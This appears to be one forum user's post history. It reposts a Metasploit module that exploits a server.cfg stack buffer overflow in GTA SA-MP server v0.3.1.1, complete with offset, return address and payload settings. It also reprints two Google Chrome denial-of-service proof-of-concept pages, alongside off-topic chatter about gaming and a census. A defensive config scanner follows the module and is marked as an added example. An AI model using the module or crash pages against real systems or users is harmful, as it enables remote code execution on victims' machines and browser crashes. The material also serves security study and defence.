Posts posted by LLegoLLaS

  1. ##
    # $Id: gta_samp.rb 14076 2011-10-26 22:16:26Z mc $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
        super(update_info(info,
          'Name' => 'GTA SA-MP server.cfg Buffer Overflow',
          'Description' => %q{
            This module exploits a stack-based buffer overflow in GTA SA-MP Server.
            This buffer overflow occurs when the application attempts to open a malformed
            server.cfg file. To exploit this vulnerability, an attacker must send the
            victim a server.cfg file and have them run samp-server.exe.
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Silent_Dream', # Original discovery, MSF Module, template by mona.py
            ],
          'Version' => '$Revision: 14076 $',
          'References' =>
            [
              [ 'URL', 'http://www.exploit-db.com/exploits/17893' ]
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'process',
            },
          'Platform' => 'win',
          'Payload' =>
            {
              'BadChars' => "\x0d\x0a\x1a",
              'Space' => 392,
              'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
              'DisableNops' => true,
              'MaxSize' => 392,
            },

          'Targets' =>
            [
              [
                'GTA SA-MP (samp-server) v0.3.1.1',
                {
                  'Ret' => 0x00429faa, # PUSH ESP; RET (samp-server.exe)
                }
              ],
            ],
          'Privileged' => false,
          'DisclosureDate' => 'Sep 18 2011',
          'DefaultTarget' => 0))

        register_options(
          [
            OptString.new('FILENAME', [ false, 'The file name.', 'server.cfg'])
          ], self.class)

      end

      def exploit

        buffer = "echo "
        buffer << rand_text_alpha_upper(379)
        buffer << [target.ret].pack('V')
        buffer << payload.encoded
        file_create(buffer)

      end
    end

    source
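
A defender-side check built from the layout the module above uses ("echo " followed by 379 filler bytes, then the return address), as an added example that is not part of the original post or of Metasploit: it flags server.cfg lines whose value runs past that offset or carries non-printable bytes. `MAX_VALUE_LEN`, the function and struct names, and both sample configs are assumptions constructed for illustration.

```ruby
# Added example: triage a server.cfg before samp-server.exe reads it.
# FILLER_LEN is taken from the module above (379 bytes follow "echo "
# before the return address, for the v0.3.1.1 target).
# MAX_VALUE_LEN is an assumed local policy limit, not an SA-MP constant.
FILLER_LEN    = 379
MAX_VALUE_LEN = 128

Finding = Struct.new(:line_no, :directive, :value_len, :reasons)

# Scan raw config bytes; return one Finding per suspicious line.
def scan_server_cfg(raw)
  findings = []
  # Work on bytes: a crafted file is not expected to be valid text.
  raw.b.split(/\r?\n/).each_with_index do |line, idx|
    next if line.strip.empty?

    directive, value = line.split(' ', 2)
    value ||= ''
    reasons = []
    reasons << "value longer than #{MAX_VALUE_LEN} bytes" if value.bytesize > MAX_VALUE_LEN
    reasons << "value runs past the #{FILLER_LEN}-byte filler offset" if value.bytesize > FILLER_LEN
    reasons << 'non-printable bytes in value' if value.match?(/[^\x20-\x7e\t]/)
    next if reasons.empty?

    findings << Finding.new(idx + 1, directive, value.bytesize, reasons)
  end
  findings
end

# Constructed samples (not taken from any real server).
CLEAN_CFG = "hostname Test Server\r\nmaxplayers 32\r\necho Executing Server Config...\r\n"
# Same shape as the module's output, with 4 marker bytes instead of an address.
CRAFTED_CFG = "hostname Test Server\r\n" + 'echo ' + ('A' * 379) + "\x01\x02\x03\x04\r\n"

if __FILE__ == $PROGRAM_NAME
  scan_server_cfg(ARGV[0] ? File.binread(ARGV[0]) : CRAFTED_CFG).each do |f|
    puts "line #{f.line_no}: #{f.directive.inspect} (#{f.value_len} bytes): #{f.reasons.join('; ')}"
  end
end
```
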

  2. I play CS too :))

    I don't have much of a chance at what? ;))

    fail, ffs =)))

    PS: take that damn gaudy thing out of your signature... it's burning my retinas (you can keep the image [although it came out really badly, layers placed haphazardly, etc.], but don't write all that idiocy at me)

    sorry for the off-topic

  3. ## pigtail23, remoteshell.de ##

    ###################################################################################

    October 22, 2011

    Ohh nice! What u doing google? Thx 4 ur bug! 0__o

    Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!!

    Testsystem: WinXP SP3, Win7(64 bit)

    Google Chrome version: 14.0.835.202

    Greetings to:

    mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...

    TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net

    ###################################################################################

    poc.html:

    too big!

    ###################################################################################

    Python script for debugging:

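    #!/usr/bin/python

    filename = 'poc.html'

    # Read the page template that the test string is spliced into
    with open('template.html', 'r') as f:
        content = f.read()

    buff = '$$*' * 36800

    # Insert the string at offset 484 of the template
    rc = 484
    content2 = content[:rc] + buff + content[rc:]

    # Write the resulting page to poc.html
    with open(filename, 'w') as f:
        f.write(content2)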

    template.html:

    <html>
    <body>
    <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
    </body>
    </html>

    source

  4. /*

    Info-sec forum: Garage4hackers Forums - Home

    [+] Google Chrome Denial Of Service (DoS)

    [+] Author: Prashant a.k.a t3rm!n4t0r

    [+] C0ntact: happyterminator@gmail.com

    [+] Platform: Windows, *nix

    [+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

    [+] Special Greets to: "vinnu" and secfence team

    [+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r

    all hackers garage crew :)

    */


    <html>
    <title>Download</title>
    <head>
    <script>
    function Lox()
    {

      var longunistring1 = unescape("%u4141?");
      var longunistring2 = unescape("??");
      var longunistring3 = unescape("??");
      var longunistring4 = unescape("??");

      for(i=0; i <= 100 ; ++i)
      {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
      }
      document.write(longunistring1);
      document.write(longunistring2);
      document.write(longunistring3);
      document.write(longunistring4);
    }
    </script>
    </head>
    <body onLoad="Lox()">
    </body>
    </html>

    source

  5. A questionnaire has a few dozen questions. In theory, the census taker is obliged to ask you all of those questions in order to get paid. He has a deadline by which he must hand in his results. That is, if he doesn't do the "inventory" of the 150 dwellings (yes, that's how many a census taker has to do) within 11 days, he doesn't get paid. If you got away with only a few questions, know that the rest of the questions are filled in "off the top of his head" by the census taker.

    well, and are there idiocies like that on those "little sheets" too? (rubber, polystyrene)? :|
